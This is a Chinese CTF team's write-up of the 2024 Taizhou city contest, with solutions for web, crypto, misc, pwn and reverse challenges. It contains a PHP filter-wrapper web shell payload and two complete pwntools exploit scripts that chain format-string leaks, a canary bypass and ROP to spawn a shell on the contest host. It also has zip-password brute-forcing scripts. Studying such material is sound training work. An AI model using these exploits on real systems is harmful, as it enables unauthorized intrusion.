A1natas 2024 台州市赛 WriteUp

A1natas

2024-10-16

WriteUp

A1natas 2024 台州市赛 WriteUp

Web

DEAD OR ALIVE

php死亡绕过 php伪协议 url二次编码绕过一下

这里开启了短tag rot47绕不过去

换成

1 2	php://filter/convert.iconv.UCS-2LE.UCS-2BE/resource=upload/shell.php contents=?%3Chp%20phpipfn(o;)%3E?

得到flag

几道菜呀

robotstxt 泄露前半flag

后半flag变量覆盖吧flag污染到变量world里面

Crypto

codemaster

爆破得到压缩包密码

hint里面看到压缩包密码

听出来摩斯编码

01 0100 0100 011 111 010 101 01 10 100 10 111 0110 0100 01 1011 11 01 101 0 0111 01 1010 101 01 100

001 0100 0100 1000解码得到压缩包密码

1	ALLWORKANDNOPLAYMAKEJACKADULLBOY

得到flag

简单的模运算

from Crypto.Util.number import *


n1 =  59291291447490366931525634934604732490686993375526804349191888372804657968568621876626267171031639542229776816809231575682674990669907844507573323062869697381007018170369953528533225693260962158277876389797698421883811693774623191453338343873376809325940622690724742325375260783954612111771505452790833107433
e1 =  1009
e2 =  661
c1 =  42985353077188042701858678659683858628193880095538312019081971299029326751867795460043384534976482867850898695817341887974850615883707385265375936859975562647458644154098813749248370155445911231152202411316142174083125556302740642264129017638217154099365335103116579136478977445028803457714891387414804454563
hint2 =  40507463249661310357827794806044375677878316124571340628557074423085821966799760539750240709046644351970536177027127843527257097695964926292300842488261880439240179761636200128317742727421272586463218228015921971356760958631902559531017704907319793768862467740343002694370348402368271531907359292269313167594
hint1 =  1271005879853316066661199285969179445258555468409602536767308127422453124456569166278548456389424001236622134198431700958874184560969387121822195176467698604581027381830540104701755158555395105056691597754287953054854072522855420859550987917092786677237411037800799757596145745139003994853090852244952501770

p=GCD(n1, hint1**e1-e1**(e1*e2)*hint2**e2)

m=pow(c1, inverse(65537, p-1),p)
print(long_to_bytes(m))


n2 =  18907964900655384324579822409386633636878766956056871585535362235214353767231073564264059287914388330411792102199606677008933621408085966756951588469677351070820733406746369679198435269992553170199992317543151904463295431360000467944654613563212110648427484740736780335622922770497302516605477200091994280170659051797483082932715112295285374951466772664058673174457133774539371864037823431076085535646866492867565053211399132137624309571702027870497719709848105717638061824558263209029252939242634210549580025431343041421766587111257036497372428545483704784943228958032869014014563237034417269447643411742587366522581092247139356905151503074118950953726319892565456479517718514001822091970116274032235077283171573739409327260871369017093426482435098823654221146125974831336950435699141428482689352594911360748437075413924102074118643817682988301168832491421799525827632647293700871699768251822202064478207264310344710162587091114198326722398521534722836191900118919600325987668228334387274131745452370144048469165896152934265086085786170745300044244328435656038364921390878141315764940004361350568616343868964642155971232793094529961537868556317288317761237430569785361173933724010332338240102029231307867651913780873895463922404696220328907265969090667253011075715302423364798124784791540343259221981176571491275777227356362593241763735078774750032170810209648159443012857333801615838630780060716065099646497273032317098446052746729617067928763959393487041510168193671378036773409927475705441371588922269531683087325413686315760604906941830110671649667896262119795185372459800672732201403353796496975239081396680894282951703497436899157694531797901273547022181574313676236049710129802224469486290831758140772148263506850711301689866687921384434558768919627058698246307704127709329632785782812326088967419473252484748677712381933762265715476433475653
hint3 =  9939018467626296300864549557153960485816202060115441771858993139956001568094397129213688325169848929397519454556265038265085753791012239390847499832076142790537570688728474176390891119329028306138917962137940523721411683756694953004757356322832322272044727574511946615053360780724964403109981221038321150251912087095566788471973368735984926133539004913163814796547521685779553548417828006578689568287135076606657942555780079060666398892624634539284576783451146414121481315811210373744629102035041262128288541384833388244359092650525684510233998198648220188818529696044589322103131713532522087913277853687802387823370812184861308056607206704924142111163623647400386387795315156552323415775302567837608141240660791558895222250523472575523943334805729177781503647940132538364353380916295244903544529895988952519161034077133368918033027698840291604695794239996491625350827193007237672555853711676946280455422865857083520387962904612732978811244632662722516874510663815000407442709650546583427701935634421822920667340400344464560819496241832753100346158973730178944583819434570015364985334123682718945396012714833234814138060680879946683598382558581755464432848629830671740874556822495651590292355132309556201503702994218748824342270746121842337819752324099307642066174745872761074064496053960340396957873940843698476902239785513353538575271300199803656708789414583304212919858466476111752009816249691548012011325635726932007337584928654763601504911235883280784689919453164650180423494792012285026508211938647974660637499188015435581876228505538395991613265963363970634342709084117396030961729066498695271401095219781344237736883159601430790828530656828799412179649742014177933116928065839153385688599329261957525423958781720021524864279277040500534782586037303978447982579881703150864520067784227584088469267877647284326147128663307302461696049106379396
hint4 =  11497927853957540365332790665731275206952151206861039571536392062632509295957449992678521695139160324432572043863866571073273424766195027066994928026020365890447586873438730677930838694248463784234422970896904779315141100899548415386962349420861970235250438845409060098489028828677789310690303276268227293420117427555062211347687022376226002772552572846005575907377875069559346178573605837280707896716903996273437999304784804469148200034055401729899984732371826562249893238400736560876412526076698397150716407768045925783960626076975474775287357623238930181817744888057241082587725853888247069373763616410186825446631363893872367121719099675878971215427631753890480342562281509217650841316549477101278836516712239644946591434882047908159355119724740895836970093220436696609508084144405957119864577550601265078506824881563233145601502789276574964256487656042156050790935757687533400014492738943377035151940053902285169162559415884261670006407914345470020985548114750984409094762491065523701667910143102554492295526746294891248183460488516919232107982441935261002056298051839186448002917036315086702724337403007094283544108605752353892969499338937456927473502637574082273446631592875576206457590873417790534425052375523311069970894661662935504029122498888677579838832589434264156033809784824308541883139057067073172969579383284214906496081973100504512465134008311849499410830926217663692810810073433508445528894019031624950077917834721653995486872359322444973369269957808220204120434820049177595069822767774880891475045042506316778272385296785381694201967451988353025446019210309412684814041807087081841227290094176745748423008005181412793105824372881451510867905760386180468940263583834371726883151840358399349831450242497969453799407724511831157375792268531837507107779497339624673256413930993867285692700231244480782493119378673295412687014852050209
hint5 =  734693499178140709107482184121639881311481497449164451247514670640712514605734040224535011153519609835276802031782238154113623838563165860055971999265801692161249909520059287311664417036724025637099701450424590923727907132999019020950844342934742235333060614209179570928227493575110697506644022234765949969346518432653798426853947974772328105759741384608693269694

q2=GCD(n2, hint3-hint4)

print(q2)
p2q2=GCD(n2,hint4-q2-hint3)
r=n2//p2q2
print(r)
print(long_to_bytes((hint5-1)//r**2))

# DASCTF{0e88f0e0-f18d-11ee-a56a-38f3abddb69b}

Misc

大ping特ping

CTF-NetA一把梭

鼠标不妙题

打开后是300个套娃压缩包，写脚本提取

import os
import zipfile
import uuid
import shutil

def extract_all(zip_path, extract_to, root_directory):
    with zipfile.ZipFile(zip_path, 'r') as zip_ref:
        for member in zip_ref.namelist():
            filename = os.path.basename(member)
            if not filename:
                continue
            source = zip_ref.open(member)
            try:
                target_path = os.path.join(extract_to, str(uuid.uuid4()) + "_" + filename)
                with source, open(target_path, "wb") as target:
                    shutil.copyfileobj(source, target)
            except RuntimeError:
                # 如果文件被加密，则将其保存到根目录下
                target_path = os.path.join(root_directory, str(uuid.uuid4()) + "_" + filename)
                with source, open(target_path, "wb") as target:
                    shutil.copyfileobj(source, target)

def recursive_unzip(directory, root_directory):
    for root, dirs, files in os.walk(directory):
        for file in files:
            if file.endswith('.zip') and not file.endswith('.dic'):
                file_path = os.path.join(root, file)
                extract_to = os.path.join(root, os.path.splitext(file)[0])
                os.makedirs(extract_to, exist_ok=True)
                extract_all(file_path, extract_to, root_directory)
                recursive_unzip(extract_to, root_directory)

if __name__ == "__main__":
    start_directory = r"\\?\C:\Users\67300\Downloads\11"
    recursive_unzip(start_directory, start_directory)

查看python的报错信息和使用everything直接得到最内层的文件

每个压缩包下有一个.dic文件，应该密码就在这300个字典中

写python脚本提取这300个字典

import os
import zipfile
import shutil
import tempfile

def extract_zip(zip_path, output_dir):
    with zipfile.ZipFile(zip_path, 'r') as zip_ref:
        with tempfile.TemporaryDirectory() as temp_dir:
            zip_ref.extractall(temp_dir)
            for root, _, files in os.walk(temp_dir):
                for file in files:
                    file_path = os.path.join(root, file)
                    if file.endswith('.zip'):
                        extract_zip(file_path, output_dir)
                    elif file.endswith('.dic'):
                        shutil.move(file_path, os.path.join(output_dir, file))
                        print(f'Extracted {file} to {output_dir}')

            shutil.rmtree(temp_dir)

zip_dir = 'C:/Users/67300/Downloads/鼠标不妙题/'
output_dir = 'C:/Users/67300/Downloads/鼠标不妙题/111'

os.makedirs(output_dir, exist_ok=True)

for filename in os.listdir(zip_dir):
    if filename.endswith('.zip'):
        zip_path = os.path.join(zip_dir, filename)
        extract_zip(zip_path, output_dir)
    if filename.endswith('.zip'):
        zip_path = os.path.join(zip_dir, filename)
        extract_zip(zip_path, output_dir)

将300个字典合并成1个，然后跑字典爆破密码

import os

output_dir = 'C:/Users/67300/Downloads/鼠标不妙题/111'
combined_file_path = 'C:/Users/67300/Downloads/鼠标不妙题/combined.dic'

with open(combined_file_path, 'w', encoding='utf-8') as combined_file:

    for filename in os.listdir(output_dir):
        if filename.endswith('.dic'):
            dic_file_path = os.path.join(output_dir, filename)

            with open(dic_file_path, 'r', encoding='utf-8') as dic_file:
                content = dic_file.read()
                combined_file.write(content)
                combined_file.write('\n')

print(f'All .dic files have been combined into {combined_file_path}')

看了一下f_几就嵌套几层，可以直接用everything一把梭，找到文件，每个文件是base64的一段

Pwn

book

from pwn import *
context.update(os = 'linux', arch = 'amd64', timeout = 5)
context.log_level = 'debug'
binary = './book'
elf = ELF(binary, checksec=False)
DEBUG = 0
if DEBUG:
    libc = elf.libc
    p = process(binary)
else:
    libc = ELF('./libc.so.6', checksec=False)
    host = '139.155.126.78'
    port = '31248'
    p = remote(host,port)

sla = lambda delim, data:     p.sendlineafter(delim, data)
sa  = lambda delim, data:     p.sendafter(delim, data)
s   = lambda data:            p.send(data)
sl  = lambda data:            p.sendline(data)
ru  = lambda delim, **kwargs: p.recvuntil(delim, **kwargs)
io  = lambda:                 p.interactive()

def cmd(idx):
    sla(b">>", str(idx).encode())

def fmt(payload):
    cmd(2)
    sa(b"name:\n", payload)
    ru(b"name is:\n")

def attack(payload):
    cmd(3)
    ru(b"write\n")
    s(payload)


def pwn():
    fmt("%8$p-%19$p-%13$p")

    ru(b"0x")
    codebase = int(p.recvn(12), 16) - 0x14a0
    ru(b"0x")
    libc.address = int(p.recvn(12), 16) - 0x24083
    ru(b"0x")
    canary = int(p.recvn(16), 16)

    system = libc.sym["system"]
    binsh = next(libc.search(b"/bin/sh"))
    success(f"libc: {libc.address:#x}")

    b = codebase + 0x4068
    pop_rdi_ret = codebase + 0x0000000000001503
    ret = pop_rdi_ret + 1

    pay = fmtstr_payload(6, {b : 0x200})
    fmt(pay)

    pay = b'a'*0x48 + p64(canary) + p64(0) + p64(ret) + p64(pop_rdi_ret) + p64(binsh) + p64(system) 
    attack(pay)


    io()
pwn()

magic_fmt

from pwn import *
context.update(os = 'linux', arch = 'amd64', timeout = 5)
context.log_level = 'debug'
binary = './magic_fmt'
elf = ELF(binary, checksec=False)
DEBUG = 0
if DEBUG:
    libc = elf.libc
    p = process(binary)
else:
    libc = ELF('./libc.so.6', checksec=False)
    host = '139.155.126.78'
    port = '37023'
    p = remote(host,port)

sla = lambda delim, data:     p.sendlineafter(delim, data)
sa  = lambda delim, data:     p.sendafter(delim, data)
s   = lambda data:            p.send(data)
sl  = lambda data:            p.sendline(data)
ru  = lambda delim, **kwargs: p.recvuntil(delim, **kwargs)
io  = lambda:                 p.interactive()

def pwn():
    ru(b"possess\n")

    pay = b'a'*0xe0
    s(pay)
    ru(b"can ")
    ru(b'a'*0xe0)

    ret_addr = u64(p.recvn(6).ljust(8, b'\x00')) + 0x8
    success(f"ret: {ret_addr:#x}")

    ru(b"else?\n")
    pay = p64(ret_addr)

    s(pay)

    ru(b"have?\n")
    pay = f"%45$p%{0x68-14}c%6$hhn".encode()
    s(pay)

    ru(b"magic:\n")
    ru(b"0x")
    libc.address = int(p.recvn(12), 16) - 0x29d90
    pop_rdi_ret = libc.address + 0x000000000002a3e5
    ret = pop_rdi_ret + 1
    system = libc.sym["system"]
    binsh = next(libc.search(b"/bin/sh"))
    success(f"libc: {libc.address:#x}")

    rsp = ret_addr - 0x118


    ru(b"possess\n")
    pay = p64(ret_addr) + fit(ret, pop_rdi_ret, binsh, system)
    s(pay)

    sa(b"else?", pay)

    ru(b"have?\n")

    rbp_offset = 34

    pay = f"%{0x8B}c%6$hhn%{(rsp&0xffff) - 0x8b}c%{rbp_offset}$hn".encode()
    # gdb.attach(p, "bbase 0x1327")
    s(pay)

    io()
pwn()

Reverse

easy_choice

#include <stdio.h>
#include <stdlib.h>
#define delta 0x9e3779b9
int main()
{
	unsigned int w[8] = {0xAC3A28FD, 0x2331590C, 0x329F681B, 0xA6CF62DB, 0x8738A413, 0x44D27414, 0xDEF3A4CD, 0x5B22BA91};//可改
	unsigned int v[2];
	unsigned int key[4] = {0x41,0x53,0x43,0x54};
	unsigned int sum;
	unsigned int y,z,p,rounds,e;
	int n = 2;
	unsigned int key2[4]={0x54,0x4f,0x44,0x41};
	for(int o=0;o<4;o++)
	{
		rounds = 6 + 52/n;
		v[0]=w[2*o];
		v[1]=w[2*o+1];
		sum = rounds*delta;
		y = v[0];
		do
		{
			e = sum >> 2 & 3;
			for(p=n-1;p>0;p--)
			{
				z = v[p-1];
				v[p] -= ((((z>>5)^(y<<2))+((y>>3)^(z<<4))) ^ ((key[(p&3)^e]^z)+(y ^ sum)));
				y = v[p];
			}
			z = v[n-1];
			v[0] -= (((key[(p^e)&3]^z)+(y ^ sum)) ^ (((y<<2)^(z>>5))+((z<<4)^(y>>3))));
			y = v[0];
			sum -= delta;
		}while(--rounds);
		rounds = 6 + 52/n;
		y = v[0];
		sum = rounds*delta;
		do
		{
			e = sum >> 2 & 3;
			for(p=n-1;p>0;p--)
			{
				z = v[p-1];
				v[p] -= ((((z>>5)^(y<<2))+((y>>3)^(z<<4))) ^ ((key2[(p&3)^e]^z)+(y ^ sum)));
				y = v[p];
			}
			z = v[n-1];
			v[0] -= (((key2[(p^e)&3]^z)+(y ^ sum)) ^ (((y<<2)^(z>>5))+((z<<4)^(y>>3))));
			y = v[0];
			sum = sum-delta;
		}while(--rounds);
		w[2*o]=v[0];
		w[2*o+1]=v[1];
	}
	for(int i=0;i<8;i++)
	{
		printf("%c%c%c%c",*((char*)&w[i]+0),*((char*)&w[i]+1),*((char*)&w[i]+2),*((char*)&w[i]+3));
	}
	return 0;
}

作者: A1natas Security Group

版权声明: 本文章采用 CC BY-NC-ND 4.0 许可协议, 转载请注明出处！